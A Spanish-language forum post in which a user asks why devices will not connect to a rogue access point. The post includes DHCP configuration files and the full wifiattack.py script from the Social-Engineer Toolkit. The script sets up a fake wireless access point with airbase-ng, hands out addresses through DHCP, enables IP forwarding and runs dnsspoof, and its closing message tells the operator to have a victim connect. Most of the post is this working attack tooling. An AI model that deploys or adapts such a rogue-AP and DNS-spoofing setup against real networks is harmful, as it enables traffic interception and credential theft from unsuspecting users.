SET - Wireless Access Point Attack Vector

Iniciado por Cr4id3r, 18 Abril 2013, 22:50 PM

0 Miembros y 1 Visitante están viendo este tema.

Cr4id3r

Hola, buenas a todos chicos, veran tengo un pequeño problemilla creando mi AP, la cosa es que inicio el servicio correctamente, puedo ver perfectamente la red, pero a la hora de conectarme con un equipo este se queda intentando establecer la conexión pero de eso no pasa, estas son las configuraciones que tengo:

dhcpd.conf

#
# Sample configuration file for ISC dhcpd for Debian
#
#

# The ddns-updates-style parameter controls whether or not the server will
# attempt to do a DNS update when a lease is confirmed. We default to the
# behavior of the version 2 packages ('none', since DHCP v2 didn't
# have support for DDNS.)
ddns-update-style none;

# option definitions common to all supported networks...
option domain-name "example.org";
option domain-name-servers ns1.example.org, ns2.example.org;

default-lease-time 600;
max-lease-time 7200;

# If this DHCP server is the official DHCP server for the local
# network, the authoritative directive should be uncommented.
authoritative;

# Use this to send dhcp log messages to a different log file (you also
# have to hack syslog.conf to complete the redirection).
log-facility local7;

# No service will be given on this subnet, but declaring it helps the
# DHCP server to understand the network topology.

subnet 192.168.1.0 netmask 255.255.255.0 {
option domain-name "mylan";
option domain-name-servers 192.168.1.1;
option routers 192.168.1.1;
option subnet-mask 255.255.255.0;
range 192.168.1.100 192.168.1.200;
}

# This is a very basic subnet declaration.

#subnet 10.254.239.0 netmask 255.255.255.224 {
#  range 10.254.239.10 10.254.239.20;
#  option routers rtr-239-0-1.example.org, rtr-239-0-2.example.org;
#}

# This declaration allows BOOTP clients to get dynamic addresses,
# which we don't really recommend.

#subnet 10.254.239.32 netmask 255.255.255.224 {
#  range dynamic-bootp 10.254.239.40 10.254.239.60;
#  option broadcast-address 10.254.239.31;
#  option routers rtr-239-32-1.example.org;
#}

# A slightly different configuration for an internal subnet.
#subnet 10.5.5.0 netmask 255.255.255.224 {
#  range 10.5.5.26 10.5.5.30;
#  option domain-name-servers ns1.internal.example.org;
#  option domain-name "internal.example.org";
#  option routers 10.5.5.1;
#  option broadcast-address 10.5.5.31;
#  default-lease-time 600;
#  max-lease-time 7200;
#}

# Hosts which require special configuration options can be listed in
# host statements.   If no address is specified, the address will be
# allocated dynamically (if possible), but the host-specific information
# will still come from the host declaration.

#host passacaglia {
#  hardware ethernet 0:0:c0:5d:bd:95;
#  filename "vmunix.passacaglia";
#  server-name "toccata.fugue.com";
#}

# Fixed IP addresses can also be specified for hosts.   These addresses
# should not also be listed as being available for dynamic assignment.
# Hosts for which fixed IP addresses have been specified can boot using
# BOOTP or DHCP.   Hosts for which no fixed address is specified can only
# be booted with DHCP, unless there is an address range on the subnet
# to which a BOOTP client is connected which has the dynamic-bootp flag
# set.
#host fantasia {
#  hardware ethernet 08:00:07:26:c0:a5;
#  fixed-address fantasia.fugue.com;
#}

# You can declare a class of clients and then do address allocation
# based on that.   The example below shows a case where all clients
# in a certain class get addresses on the 10.17.224/24 subnet, and all
# other clients get addresses on the 10.0.29/24 subnet.

#class "foo" {
#  match if substring (option vendor-class-identifier, 0, 4) = "SUNW";
#}

#shared-network 224-29 {
#  subnet 10.17.224.0 netmask 255.255.255.0 {
#    option routers rtr-224.example.org;
#  }
#  subnet 10.0.29.0 netmask 255.255.255.0 {
#    option routers rtr-29.example.org;
#  }
#  pool {
#    allow members of "foo";
#    range 10.17.224.10 10.17.224.250;
#  }
#  pool {
#    deny members of "foo";
#    range 10.0.29.10 10.0.29.230;
#  }
#}







isc-dhcp-server
# Defaults for isc-dhcp-server initscript
# sourced by /etc/init.d/isc-dhcp-server
# installed at /etc/default/isc-dhcp-server by the maintainer scripts

#
# This is a POSIX shell fragment
#

# Path to dhcpd's config file (default: /etc/dhcp/dhcpd.conf).
#DHCPD_CONF=/etc/dhcp/dhcpd.conf

# Path to dhcpd's PID file (default: /var/run/dhcpd.pid).
#DHCPD_PID=/var/run/dhcpd.pid

# Additional options to start dhcpd with.
# Don't use options -cf or -pf here; use DHCPD_CONF/ DHCPD_PID instead
#OPTIONS=""

# On what interfaces should the DHCP server (dhcpd) serve DHCP requests?
# Separate multiple interfaces with spaces, e.g. "eth0 eth1".
INTERFACES="wlan0 mon0"







wifiattack.py
#!/usr/bin/env python
##############################################
#
# This is a basic setup for an access point
# attack vector in set.
#
##############################################

import sys
import os
import subprocess
import re
import pexpect
import time
from src.core.setcore import *
from src.core.menu import text
from config.set_config import AIRBASE_NG_PATH as airbase_path
from config.set_config import ACCESS_POINT_SSID as access_point
from config.set_config import AP_CHANNEL as ap_channel
from config.set_config import DNSSPOOF_PATH as dnsspoof_path

if not os.path.isfile(dnsspoof_path):
    print_warning("DNSSpoof was not found. Please install or correct path in set_config. Exiting....")
    exit_set()

if not os.path.isfile(airbase_path):
    airbase_path = "src/wireless/airbase-ng"
    print_info("using SET's local airbase-ng binary")

print_info("For this attack to work properly, we must edit the dhcp3-server file to include our wireless interface.")
print_info("""This will allow dhcp3 to properly assign IPs. (INTERFACES="at0")""")
print("")
print_status("SET will now launch nano to edit the file.")
print_status("Press ^X to exit nano and don't forget to save the updated file!")
print_warning("If you receive an empty file in nano, please check the path of your dhcp3-server file!")
return_continue()
subprocess.Popen("nano /etc/dhcp/dhcpd.conf", shell=True).wait()

# DHCP SERVER CONFIG HERE
dhcp_config1 = ("""
ddns-update-style none;
authoritative;
log-facility local7;
subnet 10.0.0.0 netmask 255.255.255.0 {
    range 10.0.0.100 10.0.0.254;
    option domain-name-servers 8.8.8.8;
    option routers 10.0.0.1;
    option broadcast-address 10.0.0.255;
    default-lease-time 600;
    max-lease-time 7200;
}
""")

dhcp_config2 = ("""
ddns-update-style none;
authoritative;
log-facility local7;
subnet 192.168.1.0 netmask 255.255.255.0 {
    range 192.168.1.100 192.168.1.254;
    option domain-name-servers 8.8.8.8;
    option routers 192.168.1.1;
    option broadcast-address 192.168.1.255;
    default-lease-time 600;
    max-lease-time 7200;
}
""")

show_fakeap_dhcp_menu = create_menu(text.fakeap_dhcp_text, text.fakeap_dhcp_menu)
fakeap_dhcp_menu_choice = raw_input(setprompt(["8"], ""))

if fakeap_dhcp_menu_choice != "":
    fakeap_dhcp_menu_choice = check_length(fakeap_dhcp_menu_choice,2)
    # convert it to a string
    fakeap_dhcp_menu_choice = str(fakeap_dhcp_menu_choice)

if fakeap_dhcp_menu_choice == "":
    fakeap_dhcp_menu_choice = "1"

if fakeap_dhcp_menu_choice == "1":
    # writes the dhcp server out
    print_status("Writing the dhcp configuration file to src/program_junk")
    filewrite=file("src/program_junk/dhcp.conf", "w")
    filewrite.write(dhcp_config1)
    # close the file
    filewrite.close()
    dhcptun = 1

if fakeap_dhcp_menu_choice == "2":
    # writes the dhcp server out
    print_status("Writing the dhcp configuration file to src/program_junk")
    filewrite=file("src/program_junk/dhcp.conf", "w")
    filewrite.write(dhcp_config2)
    # close the file
    filewrite.close()
    dhcptun = 2

if fakeap_dhcp_menu_choice == "exit":
    exit_set()

interface = raw_input(setprompt(["8"], "Enter the wireless network interface (ex. wlan0)"))

# place wifi interface into monitor mode
print_status("Placing card in monitor mode via airmon-ng..")

# if we have it already installed then don't use the SET one
if os.path.isfile("/usr/local/sbin/airmon-ng"):
    airmonng_path = "/usr/local/sbin/airmon-ng"

if not os.path.isfile("/usr/local/sbin/airmon-ng"):
    airmonng_path = "src/wireless/airmon-ng"

monproc = subprocess.Popen("%s start %s |  grep \"monitor mode enabled on\" | cut -d\" \" -f5 | sed -e \'s/)$//\'" % (airmonng_path,interface), shell=True, stdout=subprocess.PIPE)
moniface=monproc.stdout.read()
monproc.wait()

# execute modprobe tun
subprocess.Popen("modprobe tun", shell=True).wait()

# create a fake access point
print_status("Spawning airbase-ng in a seperate child thread...")
child = pexpect.spawn('%s -P -C 20 -e "%s" -c %s %s' % (airbase_path,access_point,ap_channel,moniface))
print_info("Sleeping 15 seconds waiting for airbase-ng to complete...")
time.sleep(15)

# bring the interface up
if dhcptun==1:
    print_status("Bringing up the access point interface...")
    subprocess.Popen("ifconfig at0 up", shell=True).wait()
    subprocess.Popen("ifconfig at0 10.0.0.1 netmask 255.255.255.0", shell=True).wait()
    subprocess.Popen("ifconfig at0 mtu 1400", shell=True).wait()
    subprocess.Popen("route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1", shell=True).wait()

if dhcptun==2:
    print_status("Bringing up the access point interface...")
    subprocess.Popen("ifconfig at0 up", shell=True).wait()
    subprocess.Popen("ifconfig at0 192.168.1.1 netmask 255.255.255.0", shell=True).wait()
    subprocess.Popen("ifconfig at0 mtu 1400", shell=True).wait()
    subprocess.Popen("route add -net 192.168.1.0 netmask 255.255.255.0 gw 192.168.1.1", shell=True).wait()

# starts a dhcp server
print_status("Starting the DHCP server on a seperate child thread...")
child2 = pexpect.spawn("/etc/init.d/isc-dhcp-server -cf src/program_junk/dhcp.conf at0")

# starts ip_forwarding
print_status("Starting IP Forwarding...")
child3 = pexpect.spawn("echo 1 > /proc/sys/net/ipv4/ip_forward")

# start dnsspoof
print_status("Starting DNSSpoof in a seperate child thread...")
child4 = pexpect.spawn("%s -i at0" % (dnsspoof_path))

print_status("SET has finished creating the attack. If you experienced issues please report them.")
print_status("Now launch SET attack vectors within the menus and have a victim connect via wireless.")
print_status("Be sure to come back to this menu to stop the services once your finished.")
return_continue()
Vive solo por lo que estas dispuesto a morir.